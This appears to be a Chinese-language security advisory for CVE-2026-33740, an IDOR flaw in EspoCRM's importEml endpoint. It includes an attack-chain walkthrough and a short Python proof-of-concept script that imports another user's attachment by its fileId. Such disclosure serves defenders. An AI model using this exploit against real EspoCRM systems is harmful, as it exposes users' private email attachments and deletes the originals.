CVE-2026-33740 CVSS 5.4 中危

CVE-2026-33740 EspoCRM IDOR漏洞

披露日期: 2026-04-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33740

漏洞类型

不安全的直接对象引用 (IDOR)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

EspoCRM

漏洞概述

EspoCRM 9.3.3及以下版本存在不安全的直接对象引用（IDOR）漏洞。攻击者利用`/api/v1/Email/importEml`接口，绕过权限验证读取任意用户的.eml附件内容，并可能导致原附件被意外删除。

技术细节

该漏洞的核心在于EspoCRM的`POST /api/v1/Email/importEml`端点缺少必要的访问控制列表（ACL）校验。在该接口中，服务器直接信任用户传入的`fileId`参数，并利用该ID从存储库中检索文件，未确认当前用户是否为该附件的所有者。由于附件ID通常在UI或API流中暴露，拥有`Email:create`和`Import`低权限的攻击者可通过遍历或直接指定ID的方式，将他人的邮件附件导入到自己的收件箱。这不仅导致敏感信息泄露，还会触发系统逻辑，将受害者的原始附件记录作为导入流程的副作用而删除，造成数据完整性破坏。

攻击链分析

STEP 1

步骤1：身份认证

攻击者注册或获取一个具有Email:create和Import权限的EspoCRM账户。

STEP 2

步骤2：信息收集

通过正常UI交互或API响应，获取目标受害者附件的fileId。

STEP 3

步骤3：发送恶意请求

向/api/v1/Email/importEml端点发送POST请求，并在请求体中填入目标fileId。

STEP 4

步骤4：数据泄露与破坏

服务器验证权限缺失，直接将附件导入攻击者邮箱，导致信息泄露且原附件记录被删除。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_url, session_cookie, victim_file_id):
    """
    Exploit CVE-2026-33740 IDOR in EspoCRM.
    Requires 'Email:create' and 'Import' permissions.
    """
    endpoint = f"{target_url}/api/v1/Email/importEml"
    
    headers = {
        "Cookie": f"espo-key={session_cookie}"
    }
    
    data = {
        "fileId": victim_file_id
    }
    
    response = requests.post(endpoint, headers=headers, data=data)
    
    if response.status_code == 200:
        print("[+] Success: Attachment imported.")
        print(response.text)
    else:
        print("[-] Failed: Check permissions or ID.")

# Example usage
# exploit("http://localhost", "attacker_session", "target_attachment_id")

影响范围

EspoCRM <= 9.3.3

防御指南

临时缓解措施

建议立即检查系统权限配置，限制非必要用户的导入功能，并尽快应用官方补丁进行版本升级。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表